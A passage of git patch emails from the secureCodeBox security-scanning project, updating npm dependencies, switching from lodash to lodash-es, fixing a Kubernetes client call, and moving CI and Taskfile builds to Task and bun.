"sha512-75voc/9G4rDIJleOo4jPvN4/YC4GRZrY8yy1uU4lwrB3XEQbWve8zXoO5No4eFrGcTAMYyoY67p8jRQdtA1HbA==", - "requires": { - "convert-hrtime": "^5.0.0" - } - }, - "tr46": { - "version": "0.0.3", - "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", - "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" - }, - "typescript": { - "version": "5.8.3", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.8.3.tgz", - "integrity": "sha512-p1diW6TqL9L07nNxvRMM7hMMw4c5XOo/1ibL4aAIGmSAt9slTE1Xgw5KWuof2uTOvCg9BY7ZRi+GaF+7sfgPeQ==", - "dev": true - }, - "webidl-conversions": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", - "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==" - }, - "whatwg-url": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", - "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", - "requires": { - "tr46": "~0.0.3", - "webidl-conversions": "^3.0.0" - } - }, - "wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" - }, - "ws": { - "version": "8.18.3", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.3.tgz", - "integrity": "sha512-PEIGCY5tSlUt50cqyMXfCzX+oOPqN0vuGqWzbcJ2xvnkzkq46oOpz7dQaTDBdfICb4N14+GARUDw2XV2N4tvzg==", - "requires": {} - } } } diff --git a/hooks/cascading-scans/hook/package.json b/hooks/cascading-scans/hook/package.json index 8f0e5576a4..c262ed8886 100644 --- a/hooks/cascading-scans/hook/package.json +++ b/hooks/cascading-scans/hook/package.json @@ -40,7 +40,7 @@ "dependencies": { "@kubernetes/client-node": "^1.3.0", "ip-address": "^10.0.1", - "lodash": "^4.17.21", + "lodash-es": "^4.17.21", "matcher": "^5.0.0", "mustache": "^4.2.0", "parse-domain": "^8.2.2" diff --git a/hooks/cascading-scans/hook/scan-helpers.ts b/hooks/cascading-scans/hook/scan-helpers.ts index 2756a7a41e..04941d8598 100644 --- a/hooks/cascading-scans/hook/scan-helpers.ts +++ b/hooks/cascading-scans/hook/scan-helpers.ts @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -import { isEqual } from "lodash"; +import { isEqual } from "lodash-es"; import { CustomObjectsApi, KubeConfig } from "@kubernetes/client-node"; import type { V1Container, diff --git a/hooks/cascading-scans/hook/scope-limiter.ts b/hooks/cascading-scans/hook/scope-limiter.ts index 933b6b9cc4..cc855cbd2b 100644 --- a/hooks/cascading-scans/hook/scope-limiter.ts +++ b/hooks/cascading-scans/hook/scope-limiter.ts @@ -6,7 +6,7 @@ import { type V1ObjectMeta } from "@kubernetes/client-node"; import Mustache from "mustache/mustache.mjs"; import { Address4, Address6 } from "ip-address"; import { fromUrl, parseDomain, ParseResultType } from "parse-domain"; -import { flatten, isEqual, takeRight } from "lodash"; +import { flatten, isEqual, takeRight } from "lodash-es"; import { Finding, ScopeLimiter, ScopeLimiterAliases } from "./scan-helpers.js"; From ea7c98a736a6282a7c7dd429b4ee5a9758c7a9c3 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 7 Jul 2025 20:34:32 +0200 Subject: [PATCH 096/137] Force minor package updates --- hooks/cascading-scans/hook/package-lock.json | 52 ++++++++++++-------- hooks/cascading-scans/hook/package.json | 2 +- 2 files changed, 32 insertions(+), 22 deletions(-) diff --git a/hooks/cascading-scans/hook/package-lock.json b/hooks/cascading-scans/hook/package-lock.json index 78f3d6a5f7..07e2def7e5 100644 --- a/hooks/cascading-scans/hook/package-lock.json +++ b/hooks/cascading-scans/hook/package-lock.json @@ -510,9 +510,10 @@ } }, "node_modules/@types/js-yaml": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.5.tgz", - "integrity": "sha512-FhpRzf927MNQdRZP0J5DLIdTXhjLYzeUTmLAu69mnVksLH9CJY3IuSeEgbKUki7GQZm0WqDkGzyxju2EZGD2wA==" + "version": "4.0.9", + "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.9.tgz", + "integrity": "sha512-k4MGaQl5TGo/iipqb2UDG2UwjXziSWkh0uysQelTlJpX1qGlpUZYm8PnO4DxG1qBomtJUdYJ6qR6xdIah10JLg==", + "license": "MIT" }, "node_modules/@types/lodash": { "version": "4.14.195", @@ -569,9 +570,9 @@ } }, "node_modules/agent-base": { - "version": "7.1.3", - "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.3.tgz", - "integrity": "sha512-jRR5wdylq8CkOe6hei19GGZnxM6rBGwFl3Bg0YItGDimvjGtAvdZk4Pu6Cl4u4Igsws4a1fd1Vq3ezrhn4KmFw==", + "version": "7.1.4", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.4.tgz", + "integrity": "sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ==", "license": "MIT", "engines": { "node": ">= 14" @@ -580,7 +581,8 @@ "node_modules/argparse": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", - "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" + "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==", + "license": "Python-2.0" }, "node_modules/asynckit": { "version": "0.4.0", @@ -602,9 +604,9 @@ "optional": true }, "node_modules/bare-fs": { - "version": "4.1.5", - "resolved": "https://registry.npmjs.org/bare-fs/-/bare-fs-4.1.5.tgz", - "integrity": "sha512-1zccWBMypln0jEE05LzZt+V/8y8AQsQQqxtklqaIyg5nu6OAYFhZxPXinJTSG+kU5qyNmeLgcn9AW7eHiCHVLA==", + "version": "4.1.6", + "resolved": "https://registry.npmjs.org/bare-fs/-/bare-fs-4.1.6.tgz", + "integrity": "sha512-25RsLF33BqooOEFNdMcEhMpJy8EoR88zSMrnOQOaM3USnOK2VmaJ1uaQEwPA6AQjrv1lXChScosN6CzbwbO9OQ==", "license": "Apache-2.0", "optional": true, "dependencies": { @@ -1058,6 +1060,7 @@ "version": "5.0.0", "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", + "license": "MIT", "peerDependencies": { "ws": "*" } @@ -1075,6 +1078,7 @@ "version": "4.1.0", "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", + "license": "MIT", "dependencies": { "argparse": "^2.0.1" }, @@ -1181,9 +1185,10 @@ } }, "node_modules/node-fetch": { - "version": "2.6.12", - "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.6.12.tgz", - "integrity": "sha512-C/fGU2E8ToujUivIO0H+tpQ6HWo4eEmchoPIoXtxCrVghxdKq+QOHqEZW7tuP3KlV3bC8FRMO5nMCC7Zm1VP6g==", + "version": "2.7.0", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", + "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", + "license": "MIT", "dependencies": { "whatwg-url": "^5.0.0" }, @@ -1253,9 +1258,10 @@ } }, "node_modules/rfc4648": { - "version": "1.5.2", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.2.tgz", - "integrity": "sha512-tLOizhR6YGovrEBLatX1sdcuhoSCXddw3mqNVAcKxGJ+J0hFeJ+SjeWCv5UPA/WU3YzWPPuCVYgXBKZUPGpKtg==" + "version": "1.5.4", + "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.4.tgz", + "integrity": "sha512-rRg/6Lb+IGfJqO05HZkN50UtY7K/JhxJag1kP23+zyMfrvoB0B7RWv06MbOzoc79RgCdNTiUaNsTT1AJZ7Z+cg==", + "license": "MIT" }, "node_modules/smart-buffer": { "version": "4.2.0", @@ -1315,9 +1321,10 @@ "license": "BSD-3-Clause" }, "node_modules/stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.3.tgz", + "integrity": "sha512-pqMqwQCso0PBJt2PQmDO0cFj0lyqmiwOMiMSkVtRokl7e+ZTRYgDHKnuZNbqjiJXgsg4nuqtD/zxuo9KqTp0Yw==", + "license": "Unlicense", "engines": { "node": ">= 0.10.0" } @@ -1404,7 +1411,8 @@ "node_modules/tr46": { "version": "0.0.3", "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", - "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" + "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==", + "license": "MIT" }, "node_modules/typescript": { "version": "5.8.3", @@ -1423,12 +1431,14 @@ "node_modules/webidl-conversions": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", - "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==" + "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==", + "license": "BSD-2-Clause" }, "node_modules/whatwg-url": { "version": "5.0.0", "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", + "license": "MIT", "dependencies": { "tr46": "~0.0.3", "webidl-conversions": "^3.0.0" diff --git a/hooks/cascading-scans/hook/package.json b/hooks/cascading-scans/hook/package.json index c262ed8886..be0ccea304 100644 --- a/hooks/cascading-scans/hook/package.json +++ b/hooks/cascading-scans/hook/package.json @@ -54,4 +54,4 @@ "esbuild": "^0.25.5", "typescript": "^5.8.3" } -} \ No newline at end of file +} From bc742e8dd7bed35082372f2e9668eda995d41aeb Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 7 Jul 2025 20:40:09 +0200 Subject: [PATCH 097/137] Fix client call for new client-node version --- hooks/cascading-scans/hook/scan-helpers.ts | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/hooks/cascading-scans/hook/scan-helpers.ts b/hooks/cascading-scans/hook/scan-helpers.ts index 04941d8598..d8b78b2b38 100644 --- a/hooks/cascading-scans/hook/scan-helpers.ts +++ b/hooks/cascading-scans/hook/scan-helpers.ts @@ -194,7 +194,7 @@ export async function getCascadingRulesForScan(scan: Scan) { `Fetching CascadingScans using LabelSelector: "${labelSelector}"`, ); - const response: any = await k8sApi.listNamespacedCustomObject({ + const { items: cascadingRules } = await k8sApi.listNamespacedCustomObject({ group: "cascading.securecodebox.io", version: "v1", namespace: namespace, @@ -202,8 +202,8 @@ export async function getCascadingRulesForScan(scan: Scan) { labelSelector: labelSelector, }); - console.log(`Fetched ${response.body.items.length} CascadingRules`); - return response.body.items; + console.log(`Fetched ${cascadingRules.length} CascadingRules`); + return cascadingRules; } catch (err) { console.error("Failed to get CascadingRules from the kubernetes api"); console.error(err); From 5d79f6e58d86246a46c76777bc3f825da21ff414 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 7 Jul 2025 20:44:09 +0200 Subject: [PATCH 098/137] Migrate CI tests to use task & bun & align w/ scanners --- .github/workflows/ci.yaml | 205 +++++++++++--------------------------- 1 file changed, 59 insertions(+), 146 deletions(-) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index bd56b66f62..c67d221ca8 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -566,6 +566,7 @@ jobs: test-hooks: name: Test | Hook ${{ matrix.hook }} needs: + - sdk - operator - k8s-setup runs-on: ubuntu-22.04 @@ -573,93 +574,25 @@ jobs: matrix: hook: - cascading-scans - - generic-webhook - - persistence-azure-monitor + # - generic-webhook + # - persistence-azure-monitor # - persistence-elastic # Fails on the CI due to insufficient cpu as mentioned in issue #1165 - - persistence-dependencytrack - - update-field-hook - - finding-post-processing - - notification + # - persistence-dependencytrack + # - update-field-hook + # - finding-post-processing + # - notification # - persistence-static-report (WIP) steps: - - uses: actions/checkout@master - - - uses: actions/setup-node@v4 - with: - node-version-file: ".nvmrc" - - - name: "Start kind cluster" - run: | - kind version - kind create cluster --wait 3m --image "$KIND_NODE_IMAGE" - - name: "Inspect kind cluster" - run: | - kubectl config current-context - kubectl get node - - # ---- Install Operator & Create Namespaces ---- - - - name: Download Operator Image - uses: actions/download-artifact@v4 - with: - name: operator-image - path: ./operator - - - name: Download Lurker Image - uses: actions/download-artifact@v4 - with: - name: lurker-image - path: ./operator - - - name: Import Operator & Lurker Image - working-directory: ./operator - run: make kind-import - - - name: "Install Operator" - working-directory: ./operator - run: make helm-deploy - - # ---- Operator Health Check ---- - - - name: "Inspect Operator" - run: | - echo "Deployment in namespace 'securecodebox-system'" - kubectl -n securecodebox-system get deployments - echo "Pods in namespace 'securecodebox-system'" - kubectl -n securecodebox-system get pods - echo "Operator Startup Logs" - kubectl -n securecodebox-system logs deployment/securecodebox-controller-manager - - - name: "Create 'demo-targets' namespace" - run: "kubectl create namespace demo-targets" - - # ---- Import Parser SDK Artifact - - - name: Download Parser SDK Image - uses: actions/download-artifact@v4 - with: - name: parser-sdk-image - path: /tmp - - - name: Load Parser SDK Image - run: | - docker load --input /tmp/parser-sdk.tar - docker images | grep sdk + - name: Checkout + uses: actions/checkout@v4 - # ---- Import Hook SDK Artifact + - name: Install bun + uses: oven-sh/setup-bun@v2 - - name: Download Hook SDK Image - uses: actions/download-artifact@v4 + - name: Install Task + uses: arduino/setup-task@v2 with: - name: hook-sdk-image - path: /tmp - - - name: Load Parser SDK Image - run: | - docker load --input /tmp/hook-sdk.tar - docker images | grep sdk - - # ---- K8s Cluster Setup ---- # + version: 3.x - name: Download Kind uses: actions/download-artifact@v4 @@ -691,61 +624,61 @@ jobs: kubectl version || true helm version - # ----- Build Test-Scan ScanType Image ---- - - - name: Build Images - working-directory: ./scanners/test-scan/ - run: make docker-build - - - name: Export Docker Images - working-directory: ./scanners/test-scan/ - run: make docker-export - - - name: Kind import - working-directory: ./scanners/test-scan/ - run: make kind-import - - - name: Test-scan deploy - working-directory: ./scanners/test-scan/ - run: make deploy - - # ----- Build Hook Image ---- + - name: Unit Tests + working-directory: ./hooks/${{ matrix.hook }}/ + run: task test:unit - - name: Build Images - working-directory: ./hooks/${{ matrix.hook }} - run: make docker-build + - name: Download Parser SDK Image + uses: actions/download-artifact@v4 + with: + name: hook-sdk-image + path: /tmp - - name: Export Docker Images - working-directory: ./hooks/${{ matrix.hook }} - run: make docker-export + - name: Load Hook SDK Image + run: | + docker load --input /tmp/hook-sdk.tar + docker images | grep sdk - - name: Kind import - working-directory: ./hooks/${{ matrix.hook }} - run: make kind-import + - name: Download Operator Image + uses: actions/download-artifact@v4 + with: + name: operator-image + path: ./operator - - name: "Install Test Dependencies" - working-directory: ./hooks - run: npm ci + - name: Load Operator Image + run: | + docker load --input ./operator/operator.tar + docker images | grep operator - # ---- Unit-Test ---- + - name: Download Lurker Image + uses: actions/download-artifact@v4 + with: + name: lurker-image + path: ./operator - - name: "Run Unit Tests" - working-directory: ./hooks/${{ matrix.hook }} - run: make unit-tests + - name: Load Lurker Image + run: | + docker load --input ./operator/lurker.tar + docker images | grep lurker - # ---- Integration-Test ---- + - name: "Start kind cluster" + run: | + task prepare-testing-env - - name: Deploy ${{ matrix.hook }} - working-directory: ./hooks/${{ matrix.hook }} - run: make deploy + - name: ${{ matrix.hook }} Build Scanner / Parser Images + working-directory: ./hooks/${{ matrix.hook }}/ + run: task build - - name: Deploy Test Dependencies - working-directory: ./hooks/${{ matrix.hook }} - run: make deploy-test-deps + - name: ${{ matrix.hook }} Load and Deploy Scanner / Parser Images to kind Cluster + working-directory: ./hooks/${{ matrix.hook }}/ + run: task deploy - - name: "Run Integration Test" - working-directory: ./hooks/${{ matrix.hook }} - run: make integration-tests + - name: Start Integration Tests + uses: nick-fields/retry@ce71cc2ab81d554ebbe88c79ab5975992d79ba08 # v3.0.2 + with: + timeout_minutes: 15 + max_attempts: 3 + command: cd ./hooks/${{ matrix.hook }}/ && task test:integration # ---- Debuging Cluster on Failure ---- @@ -775,26 +708,6 @@ jobs: echo "Operator Startup Logs" kubectl -n securecodebox-system logs deployment/securecodebox-controller-manager - - name: Test-scan integration-tests - working-directory: ./scanners/test-scan/ - run: | - helm -n integration-tests upgrade --install test-scan . \ - --set="scanner.image.repository=docker.io/securecodebox/scanner-test-scan" \ - --set="parser.image.repository=docker.io/securecodebox/parser-test-scan" \ - --set="parser.image.tag=sha-$(git rev-parse --short HEAD)" \ - --set="scanner.image.tag=sha-$(git rev-parse --short HEAD)" \ - --set="parser.env[0].name=CRASH_ON_FAILED_VALIDATION" \ - --set-string="parser.env[0].value=true" \ - --set="parser.env[1].name=PRODUCE_INVALID_FINDINGS" \ - --set-string="parser.env[1].value=true" - make integration-tests - - # ---- Clean UP ---- - - - name: "Delete kind cluster" - run: | - kind delete cluster - sbctcl-tests: name: "Run sbctcl Tests" runs-on: ubuntu-22.04 From bf6944051b194ff3d3dc4c6a6798ac9aa9763b4f Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 9 Jul 2025 14:19:43 +0200 Subject: [PATCH 099/137] Move core:prepare-testing-env step into cmds so that it is run before the the build build needs the cluster to be available to load the images into it --- hooks/Taskfile.yaml | 5 ++--- scanners/Taskfile.yaml | 5 ++--- 2 files changed, 4 insertions(+), 6 deletions(-) diff --git a/hooks/Taskfile.yaml b/hooks/Taskfile.yaml index 4507690732..c0cc2fef16 100644 --- a/hooks/Taskfile.yaml +++ b/hooks/Taskfile.yaml @@ -38,12 +38,11 @@ tasks: silent: true deploy: desc: Deploy the {{ .hookName }} hook to the testing environment - deps: - - core:prepare-testing-env - - build status: - helm ls {{ .hookName }} -n integration-tests | grep -q '{{ .hookName }}' || false cmds: + - task: core:prepare-testing-env + - task: build - 'echo "Deploying {{ .hookName }} to the testing environment"' - task: predeploy - | diff --git a/scanners/Taskfile.yaml b/scanners/Taskfile.yaml index 2984593695..6688c1d8c4 100644 --- a/scanners/Taskfile.yaml +++ b/scanners/Taskfile.yaml @@ -55,12 +55,11 @@ tasks: silent: true deploy: desc: Deploy the {{ .scannerName }} scanner to the testing environment - deps: - - core:prepare-testing-env - - build status: - helm ls {{ .scannerName }} -n integration-tests | grep -q '{{ .scannerName }}' || false cmds: + - task: core:prepare-testing-env + - task: build - 'echo "Deploying {{ .scannerName }} to the testing environment"' - task: predeploy - | From c77bf63090dbe2c3de7b8d1ac046042281d8b703 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 9 Jul 2025 16:11:08 +0200 Subject: [PATCH 100/137] Optimize dirs in taskfiles that they still work when included from another dir / taskfile e.g. a hook including a scanner --- hooks/Taskfile.yaml | 22 +++++++++++----------- scanners/Taskfile.yaml | 34 +++++++++++++++++----------------- 2 files changed, 28 insertions(+), 28 deletions(-) diff --git a/hooks/Taskfile.yaml b/hooks/Taskfile.yaml index c0cc2fef16..0dd2fa8ed7 100644 --- a/hooks/Taskfile.yaml +++ b/hooks/Taskfile.yaml @@ -30,7 +30,7 @@ tasks: echo "Building custom hook image for {{ .hookName }} with tag ${IMG_TAG}" docker build -t docker.io/securecodebox/hook-{{ .hookName }}:${IMG_TAG} \ --build-arg=baseImageTag=${IMG_TAG} \ - {{ .ROOT_DIR }}/hook/ + {{ .TASKFILE_DIR }}/{{ .hookName }}/hook/ kind load docker-image --name testing-env docker.io/securecodebox/hook-{{ .hookName }}:${IMG_TAG} predeploy: desc: Can be overwritten by the hook to perform any pre-deployment steps @@ -46,7 +46,7 @@ tasks: - 'echo "Deploying {{ .hookName }} to the testing environment"' - task: predeploy - | - helm upgrade --install {{ .hookName }} {{ .ROOT_DIR }} --namespace integration-tests \ + helm upgrade --install {{ .hookName }} {{ .TASKFILE_DIR }}/{{ .hookName }} --namespace integration-tests \ --set="hook.image.tag=${IMG_TAG}" \ --set="hook.image.pullPolicy=Never" \ {{ if ne "" .additionalHelmInstallArgsForHook -}} @@ -58,21 +58,21 @@ tasks: test:setup:hook-sdk: internal: true status: - - "[ -d {{ .ROOT_DIR }}/../../hook-sdk/nodejs/node_modules ] || false" + - "[ -d {{ .TASKFILE_DIR }}/../hook-sdk/nodejs/node_modules ] || false" cmds: - - cd {{ .ROOT_DIR }}/../../hook-sdk/nodejs/ && bun install + - cd {{ .TASKFILE_DIR }}/../hook-sdk/nodejs/ && bun install test:setup:test-helpers: internal: true status: - - "[ -d {{ .ROOT_DIR }}/../../tests/integration/node_modules ] || false" + - "[ -d {{ .TASKFILE_DIR }}/../tests/integration/node_modules ] || false" cmds: - - cd {{ .ROOT_DIR }}/../../tests/integration && bun install + - cd {{ .TASKFILE_DIR }}/../tests/integration && bun install test:setup:hook-deps: internal: true status: - - "[ -d {{ .ROOT_DIR }}/hook/node_modules ] || false" + - "[ -d {{ .TASKFILE_DIR }}/{{ .hookName }}/hook/node_modules ] || false" cmds: - - cd {{ .ROOT_DIR }}/hook/ && bun install + - cd {{ .TASKFILE_DIR }}/{{ .hookName }}/hook/ && bun install test:setup: cmds: - task: test:setup:hook-sdk @@ -86,7 +86,7 @@ tasks: cmds: - | echo "Running unit tests for {{ .hookName }}" - bun test {{ .ROOT_DIR }}/hook/ + bun test {{ .TASKFILE_DIR }}/{{ .hookName }}/hook/ test:integration: desc: Run integration tests for the {{ .hookName }} hook deps: @@ -111,14 +111,14 @@ tasks: pkill -f "kubectl proxy" - echo "Running integration tests for {{ .hookName }}" - - bun test {{ .ROOT_DIR }}/integration-tests/ + - bun test {{ .TASKFILE_DIR }}/{{ .hookName }}/integration-tests/ test:helm: desc: Run helm tests for the {{ .hookName }} hook preconditions: - msg: "Helm unittest plugin is not installed, you need to install it first. See: https://github.com/helm-unittest/helm-unittest/" sh: "helm plugin list | grep -q 'unittest' || false" cmds: - - helm unittest {{ .ROOT_DIR }} + - helm unittest {{ .TASKFILE_DIR }}/{{ .hookName }} test: desc: Run all tests for the {{ .hookName }} hook cmds: diff --git a/scanners/Taskfile.yaml b/scanners/Taskfile.yaml index 6688c1d8c4..f1fd7da0f5 100644 --- a/scanners/Taskfile.yaml +++ b/scanners/Taskfile.yaml @@ -11,9 +11,9 @@ includes: vars: # if the scanner uses a custom scanner container image which needs to be built. Usually false as we prefer to reference the official scanner container images hasCustomScanner: - sh: 'if [ -d "{{ .ROOT_DIR }}/scanner/" ]; then echo "true"; else echo "false"; fi' + sh: 'if [ -d "{{ .TASKFILE_DIR }}/{{ .scannerName }}/scanner/" ]; then echo "true"; else echo "false"; fi' parserUsesNpmDependencies: - sh: 'if [ -f "{{ .ROOT_DIR }}/parser/package.json" ]; then echo "true"; else echo "false"; fi' + sh: 'if [ -f "{{ .TASKFILE_DIR }}/{{ .scannerName }}/parser/package.json" ]; then echo "true"; else echo "false"; fi' # addtional cli args to pass to the helm install command which installs the scanner into the testing environment additionalHelmInstallArgsForScanner: '{{ .additionalHelmInstallArgsForScanner | default "" }}' env: @@ -36,9 +36,9 @@ tasks: {{ if eq "true" .hasCustomScanner -}} echo "Building custom scanner image for {{ .scannerName }} with tag ${IMG_TAG}" docker build -t docker.io/securecodebox/scanner-{{ .scannerName }}:${IMG_TAG} \ - --build-arg=scannerVersion=$(yq eval .appVersion {{ .ROOT_DIR }}/Chart.yaml) \ + --build-arg=scannerVersion=$(yq eval .appVersion {{ .TASKFILE_DIR }}/{{ .scannerName }}/Chart.yaml) \ --build-arg=baseImageTag=${IMG_TAG} \ - {{ .ROOT_DIR }}/scanner/ + {{ .TASKFILE_DIR }}/{{ .scannerName }}/scanner/ kind load docker-image --name testing-env docker.io/securecodebox/scanner-{{ .scannerName }}:${IMG_TAG} {{ else -}} echo "No custom scanner image defined, assuming scanner doen't need to be build" @@ -47,7 +47,7 @@ tasks: echo "Building parser image for {{ .scannerName }} with tag ${IMG_TAG}" docker build -t docker.io/securecodebox/parser-{{ .scannerName }}:${IMG_TAG} \ --build-arg=baseImageTag=${IMG_TAG} \ - {{ .ROOT_DIR }}/parser/ + {{ .TASKFILE_DIR }}/{{ .scannerName }}/parser/ kind load docker-image --name testing-env docker.io/securecodebox/parser-{{ .scannerName }}:${IMG_TAG} predeploy: desc: Can be overwritten by the scanner to perform any pre-deployment steps @@ -63,7 +63,7 @@ tasks: - 'echo "Deploying {{ .scannerName }} to the testing environment"' - task: predeploy - | - helm upgrade --install {{ .scannerName }} {{ .ROOT_DIR }} --namespace integration-tests \ + helm upgrade --install {{ .scannerName }} {{ .TASKFILE_DIR }}/{{ .scannerName }} --namespace integration-tests \ {{ if eq "true" .hasCustomScanner -}} --set="scanner.image.tag=${IMG_TAG}" \ --set="scanner.image.pullPolicy=Never" \ @@ -79,27 +79,27 @@ tasks: test:setup:parser-sdk: internal: true status: - - "[ -d {{ .ROOT_DIR }}/../../parser-sdk/nodejs/node_modules ] || false" + - "[ -d {{ .TASKFILE_DIR }}/../parser-sdk/nodejs/node_modules ] || false" cmds: - - cd {{ .ROOT_DIR }}/../../parser-sdk/nodejs/ && bun install + - cd {{ .TASKFILE_DIR }}/../parser-sdk/nodejs/ && bun install test:setup:scanner-dir: internal: true status: - - "[ -d {{ .ROOT_DIR }}/../node_modules ] || false" + - "[ -d {{ .TASKFILE_DIR }}/../node_modules ] || false" cmds: - - cd {{ .ROOT_DIR }}/../ && bun install + - cd {{ .TASKFILE_DIR }}/../ && bun install test:setup:test-helpers: internal: true status: - - "[ -d {{ .ROOT_DIR }}/../../tests/integration/node_modules ] || false" + - "[ -d {{ .TASKFILE_DIR }}/../tests/integration/node_modules ] || false" cmds: - - cd {{ .ROOT_DIR }}/../../tests/integration && bun install + - cd {{ .TASKFILE_DIR }}/../tests/integration && bun install test:setup:parser-deps: internal: true status: - - '{{ if eq "true" .parserUsesNpmDependencies -}}[ -d {{ .ROOT_DIR }}/parser/node_modules ] || false{{ else -}}true{{ end -}}' + - '{{ if eq "true" .parserUsesNpmDependencies -}}[ -d {{ .TASKFILE_DIR }}/{{ .scannerName }}/parser/node_modules ] || false{{ else -}}true{{ end -}}' cmds: - - cd {{ .ROOT_DIR }}/parser/ && bun install + - cd {{ .TASKFILE_DIR }}/{{ .scannerName }}/parser/ && bun install test:setup: cmds: - task: test:setup:parser-sdk @@ -114,7 +114,7 @@ tasks: cmds: - | echo "Running integration tests for {{ .scannerName }}" - bun test {{ .ROOT_DIR }}/parser/ + bun test {{ .TASKFILE_DIR }}/{{ .scannerName }}/parser/ test:integration: desc: Run integration tests for the {{ .scannerName }} scanner deps: @@ -139,14 +139,14 @@ tasks: pkill -f "kubectl proxy" - echo "Running integration tests for {{ .scannerName }}" - - bun test {{ .ROOT_DIR }}/integration-tests/ + - bun test {{ .TASKFILE_DIR }}/{{ .scannerName }}/integration-tests/ test:helm: desc: Run helm tests for the {{ .scannerName }} scanner preconditions: - msg: "Helm unittest plugin is not installed, you need to install it first. See: https://github.com/helm-unittest/helm-unittest/" sh: "helm plugin list | grep -q 'unittest' || false" cmds: - - helm unittest {{ .ROOT_DIR }} + - helm unittest {{ .TASKFILE_DIR }}/{{ .scannerName }} test: desc: Run all tests for the {{ .scannerName }} scanner cmds: From 362d1d59e9b95d2a98d332142c20adbadb178626 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 9 Jul 2025 16:11:21 +0200 Subject: [PATCH 